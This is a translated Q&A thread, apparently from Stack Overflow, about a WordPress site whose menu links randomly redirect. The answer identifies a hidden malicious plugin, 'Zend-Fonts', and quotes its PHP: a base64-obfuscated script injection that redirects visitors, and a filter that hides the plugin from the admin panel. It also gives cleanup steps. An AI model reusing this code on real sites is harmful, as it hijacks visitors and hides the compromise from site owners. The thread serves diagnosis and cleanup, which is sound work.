wordpress - WordPress 页面出现奇怪的 "array URL"错误

Question

我真的找不到任何关于此的信息，甚至没有遇到同样问题的人:

我们的 WordPress 页面最近在菜单导航时开始出现错误。

有时 - 但并非总是 - 如果您单击通常会转到子页面之一的菜单项之一，则 URL 栏中调用的 URL 会“变形”为类似“https://array/?u =t11kd0b&o=zac8myd&m=1"。

这当然是无意义的，并且会导致错误。

您必须返回或重新加载页面，如果再次单击，请求将得到正常处理并加载正确的页面，并且错误不再发生。它似乎只能随机重现。

重启浏览器后，错误似乎又出现了...

对此有什么想法吗？这对你来说可以重现吗？

我们尝试了不同的机器和浏览器，并且在所有机器和浏览器上都发生了这种情况。

任何帮助将不胜感激!

Answer 1

好的......我发现问题了。恶意软件。这似乎是一个名为 Zend-Fonts 的“隐藏插件”的问题，我们从未安装过它。它没有显示在插件面板中(除非我经历了健康检查插件的恢复模式)。

我查看了插件 .php 文件，发现此函数中的 URL 栏中有时出现的字符串:

if (!$_COOKIE[base64_decode('aHRfcnI=') ]) {
        setcookie( base64_decode( 'aHRfcnI=' ), 1, time() + 86400, base64_decode( 'Lw==' ) );

        echo base64_decode( 'PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi' ) . 'https://'.$url.'/?u=t11kd0b&o=zac8myd&m=1' . base64_decode( 'Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi' ) . 'https://'.$url.'/?u=t11kd0b&o=zac8myd&m=1' . base64_decode( 'Ijs8L3NjcmlwdD4=' );
    }
}

这似乎是隐藏插件的代码(正确记录代码真是太好了......):

//hide plugin
add_filter('all_plugins', 'hide_plugins');
function hide_plugins($plugins) {
    unset($plugins['zend-fonts-wp/zend-fonts-wp.php']);
    return $plugins;
}

但是，我无法在恢复模式下删除该插件......因此我删除了 WordPress 安装中的插件文件夹 (wp-contents/plugins/zend-fonts-wp)。

希望这已经足够了......

谷歌搜索没有给我提供太多关于该插件/恶意软件的信息。它似乎想重定向到某个 XXX 网站。

希望这对遇到同样问题的人有所帮助。

编辑:通过查看插件代码，我还发现了 WordPress SQL 数据库的一些条目。

我删除了代码中引用的数据库“wp_zen_timetable”和“wpusers_inputs”

您可以识别出它们不是来自 WordPress，因为它们的类型/引擎是 MyISAM(所有其他数据库都是 InnoDb) - 因此，如果您按数据库类型对数据库进行排序，它们就会脱颖而出。